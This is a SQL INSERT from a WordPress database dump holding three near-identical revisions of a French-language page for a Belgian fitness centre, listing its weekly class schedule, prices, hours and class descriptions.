INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(169, 1, '2013-07-03 16:33:05', '2013-07-03 16:33:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:33:05', '2013-07-03 16:33:05', '', 11, 'http://www.crosstrainingcenter.be/?p=169', 0, 'revision', '', 0),
(165, 1, '2013-07-03 16:28:22', '2013-07-03 16:28:22', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td class=\"ttitre\">Lundi</td>\r\n<td class=\"ttitre\">Mardi</td>\r\n<td class=\"ttitre\">Mercredi</td>\r\n<td class=\"ttitre\">Jeudi</td>\r\n<td class=\"ttitre\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:28:22', '2013-07-03 16:28:22', '', 11, 'http://www.crosstrainingcenter.be/?p=165', 0, 'revision', '', 0),
(163, 1, '2013-07-03 16:26:59', '2013-07-03 16:26:59', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:26:59', '2013-07-03 16:26:59', '', 11, 'http://www.crosstrainingcenter.be/?p=163', 0, 'revision', '', 0),
